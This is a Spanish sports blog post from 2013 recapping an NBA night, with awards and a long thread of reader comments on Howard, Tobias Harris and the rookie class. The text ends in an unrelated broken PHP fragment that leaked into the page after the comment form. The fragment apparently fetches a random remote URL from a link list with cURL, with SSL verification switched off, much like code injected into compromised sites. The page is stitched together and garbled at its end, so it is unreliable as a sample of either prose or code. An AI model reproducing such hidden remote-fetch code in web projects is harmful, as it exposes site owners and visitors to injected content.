La Crónica: Hack-a-Howard sin recompensa

13 de March de 2013 por txusma

Esta vez no funcionó el Hack-a-Howard, o no funcionó del todo. Los Magic llevaron de manera descarada una y otra vez al pívot de los Lakers a la línea y este igualó con 39 el récord NBA de tiros libres lanzados. Anotó 25, con un más que digno 16 de 20 en la segunda parte. El acierto de Howard en los tiros libres acalló a los aficionados que acudieron a su antiguo pabellón  y amarró la victoria para los suyos (106-97).

Por su parte, unos Spurs diezmados cayeron en Minnesota ante el recital de Ricky Rubio, que consiguió el primer triple doble de su carrera. Sin Parker, Duncan y Leonard, poco pudieron hacer los de San Antonio que vieron como los jóvenes Wolves les masacraban en el segundo cuarto (83-107). En otro duelo del Oeste, Memphis se impuso a Portland de la mano de un Zach Randolph que volvía de su lesión (102-97). Es la decimotercera victoria en catorce encuentros para los Grizzlies, que siguen defendiendo con uñas y dientes la cuarta posición de la conferencia. Apasionante duelo el que mantienen con los Nuggets.

En el Este, victoria de los Heat (y ya van 19) ante los Hawks con un Dwyane Wade que anda desbocado en los últimos partidos (81-98). Sólo 3 franquicias han conseguido ganar 20 o más partidos consecutivos la misma temporada y Miami intentará unirse al grupo esta misma noche en Philadelphia. En cambio, los Celtics sufrieron una humillante derrota ante los Bobcats. No sólo perdieron ante los colistas, que venían de perder 10 partidos consecutivos, sino que lo hicieron por 26 puntos de diferencia (74-100). Paul Pierce descansó y ningún otro jugador verde asumió el protagonismo ofensivo. En cambio, Gerald Henderson se dio un festival ante una de las mejores parejas defensivas de la liga, Courtney Lee y Avery Bradley. 

En el resto de partidos del día, victoria de los Mavs ante Milwaukee (115-108) gracias al buen acierto de Vince Carter desde la línea de 3 en el último cuarto; de Cleveland sobre los Wizards de la mano de Dion Waiters (90-95), y de los Nets ante los Hornets con los hermanos Lopez enfrentados en un bonito duelo (98-108).

 PREMIOS

MVP: Dwight Howard jugó su mejor partido de la temporada casualmente contra su ex-equipo. El pívot de los Lakers anotó 25 de los 39 tiros libres que intentó y acabó con 39 puntos, 16 rebotes y 3 tapones.  Y después de mucho rondarlo, Ricky Rubio consiguió un triple con 21 puntos, 13 rebotes y 12 asistencias.

Rookie: Grandes actuaciones de los 2 mejores jóvenes: 30 puntos y 7 asistencias de Damian Lillard, y 17 puntos, 11 rebotes y 5 asistencias de Anthony Davis. Otros destacados fueron, Dion Waiters que anotó 20 puntos, 12 de ellos en el último cuarto, y Jae Crowder que salió como titular y consiguió 14 puntos y 8 rebotes.

Sorpresa: Explosión anotador de Gerald Henderson, que con 35 puntos masacró a unos confundidos Celtics. Su compañero Josh McRoberts también colaboró con 13 puntos y 10 rebotes.

Decepción: Terrible partido de los Celtics y en particular de Kevin Garnett. Se quedó en un 2 de 10 en tiros de campo y solo cogió 2 rebotes.

Esfuerzo en vano: John Wall lo dio todo pero se quedó a las puertas de la victoria. Sus 27 puntos, 7 rebotes y 14 asistencias fueron a la postre insuficientes para imponerse a los Cavs.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Paliza de Wolves a Spurs y de Bobcats a Celtics. Qué cosas…

    Preguntaba rumbero si lo de Tobias Harris va en serio, y creo que no hace falta más que verlo jugar para darse cuenta de que sí. Tiene un físico excelente, es muy atlético, rebotea muy bien, es muy activo en defensa y ataque… El tiro en suspensión no me parece demasiado fiable y creo que lo ha de mejorar, pero con sólo 20 años el chaval promete mucho. Sorprende que los Bucks se lo cargasen tras darle la titularidad en los primeros partidos de la temporada.

      Citar

  2. Denise dice:
    #2

    Salvando las distancias…Harris me recuerda a Blake Griffin, aunque Harris tiene hasta mejor tiro exterior.

    No he visto nada del Orlando-Lakers, pero creo que Orlando se equivoca pegando garrotazos a Howard durante todo el partido, y mas aun cuando Howard fue de menos a más y acabó anotandolos casi todos. Creo que Orlando tiene jugadores suficientemente buenos y capacitados para defenderle sin tener que recurrir a esas artimañas, y más aun a Howard que está temporada no está a su mejor nivel y sin esos ” hacks” a lo mejor no habría anotado ni 25 puntos. Al final les salió el tiro por la culata y ademas de perder el partido y dar un pobre espectaculo con las faltas, hizo que el enemigo Howard numericamente hiciera uno de los mejores partidos de su vida.

    Lo bueno, es que los propios aficionados de Orlando se han dado cuenta de que hay vida mas allá de Howard y el actual estado anímico del aficionado no es el de principio de temporada de “el equipo se nos desmantela”, sino la sensación actual es que con un poco de suerte, el año que viene puede haber hasta opciones de Playoffs.

      Citar

  3. Esteban dice:
    #3

    es idea mia pero cuando irving no ha jugado estos ultimos partidos los cavs han ganado y dion waiters se ha candidateado para estar en el quinteto rookie?
    hablando del quinteto rookie, que de jugadores madre mia!!
    lillard sera el base, pero es escolta se debatira a fuego entre waiters y beal, yo sinceramente me quedo con el p`rimero, pero no por mucho, quiza entren los dos,
    pero eso significaria que se saca un alero, barnes o MKG deberian quedar fuera en todo caso ambos, un desproposito considerando que barnes es titular en una franquicia que ira a PO luego de años
    El ala pivote no hay dudas que sera davis, thomas robinson y montiejunas lo miraran de afuera
    solo queda lugar para un grandote, y ese sera drummond, dejando afuera a valanciunas

    sencillamente una extraordinaria camada

      Citar

  4. rumbero dice:
    #4

    A Harris lo conocía por sus buenos números de boxscore pero ayer me dió muy buena impresión, lo que comentais, jugador bastante completo en todas las facetas para lo joven que es. Me sorprendió sobretodo el buen manejo cerca del aro tanto para meterla como para rebotear gracias en parte a ese gran físico que le permite jugar de 4. Buena base tienen estos Magic.

    Y ya que siempre le caen palos a Howard pues hoy toca decir que ayer se comió a Orlando. Mala pinta tenía el asunto cuando empezaron a enviarlo constantemente a la línea de TL con el público abucheando y ese 2/9 con el que comenzó pero sorprendentemente tuvo la cabeza muy bien puesta. Como dice Denise, al final se equivocaron los Magic dando palo tras palo sin intentar si siquiera defenderlo un poco. Lleva dos partidos buenos, veremos si sigue con esta línea porque entonces los Lakers ya son otra cosa. Que no aparezca el nombre de Bryant en toda la crónica y ganen es una buena noticia. Ayer tocaba la cara B, fallón en el tiro pero dando juego.

      Citar

  5. Esteban dice:
    #5

    Harris tiene pinta de nuevo jugador franquicia para el magic, no serra na strella pero sera quien venda camisetas de orlando los proximos 2 años

      Citar

  6. Esteban dice:
    #6

    un partido verdaderamente dominante como el de ayer creo que era lo que necesitaba howard para sentirse howard denuevo, incluso hasta encesto los triples

    en los lakers los rendimientos de clark y metta bajaron a lo terrenal y empeizan a parecerse a lo que se espera de ellos, pero como contrapartida, han empezado a rendir de manera parecida a lo que se esperaba de ellos, howard, nash, jamison, meeks y blake, por lo que salen ganando claramente

      Citar

  7. Denise dice:
    #7

    Esteban:
    Harris tiene pinta de nuevo jugador franquicia para el magic, no serra na strella pero sera quien venda camisetas de orlando los proximos 2 años

    jaja..ojala….aunque yo no creo que llegue a tanto como para ser un jugador franquicia en un equipo que en el futuro quiera aspirar al anillo. Quizá en el futuro desarrolle una carrera a lo pueda Shawn Marion en su etapa en Dallas.

      Citar

  8. Simon dice:
    #8

    Yo creo que Esteban se refería mas bien ha que Harris va a hacer el papel de jugador franquicia mientras dure la reconstrucción. En plan que va a ser el más destacado e “idolo” de los aficionados mientras no llegue nadie ilusionante de verdad no se referia a jugador franquicia en el sentido de “un jugador sobre el que construir el equipo”

      Citar

  9. Esteban dice:
    #9

    Simon:
    Yo creo que Esteban se refería mas bien ha que Harris va a hacer el papel de jugador franquicia mientras dure la reconstrucción. En plan que va a ser el más destacado e “idolo” de los aficionados mientras no llegue nadie ilusionante de verdad no se referia a jugador franquicia en el sentido de “un jugador sobre el que construir el equipo”

    exactamente, lo mas alarmante de el roster de los MAGIC hace un mes era la imposibilidad de que alguno de sus muchachos se volviera una semi-estrella
    nicholson, harkless, vucevic eran todos jugadores jovenes con futuro, pero todos lejos de ser una jugador que sea la cara del equipo, menos aun podian serlos los veteranos acabados como nelson, turkoglu o harrington y menos aun jugadores jovenes pero de rol como aflalo y davis

    harris podra meter algunos buenos mates, ser un 3 con numeros cercanos al 20-10, ser joven y atletico,

    al menos va a vender camisetas, como decia

      Citar

  10. Jose Luis dice:
    #10

    Si los Lakers tenían que perder, que fuera así, por relajados, para que salgan a por todas en los próximos, porque vaya tela caer ante unos Hawks sin Smith ni Teague ni Pachulia. Dahntay Jones ha defendido bien la última, aunque después ha dejado el pie a lo Bruce Bowen para que Bryant lo pisase al caer y se lesionase.

    Lo dicho, si tienen que perder que sea así y que espabilen, que todos los partidos hay que jugarlos, y más ellos que están jugándose PO.

      Citar

  11. Denise dice:
    #11

    Esteban: menos aun podian serlos los veteranos acabados como nelson, turkoglu o harrington y menos aun jugadores jovenes pero de rol como aflalo y davisharris podra meter algunos buenos mates, ser un 3 con numeros cercanos al 20-10, ser joven y atletico, al menos va a vender camisetas, como decia

    Joer, el “veterano acabado” Nelson está haciendo la 2º mejor temporada de su carrera tras aquella en la que fue All-Star. Vaya jugador infravalalorado a nivel mediatico.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>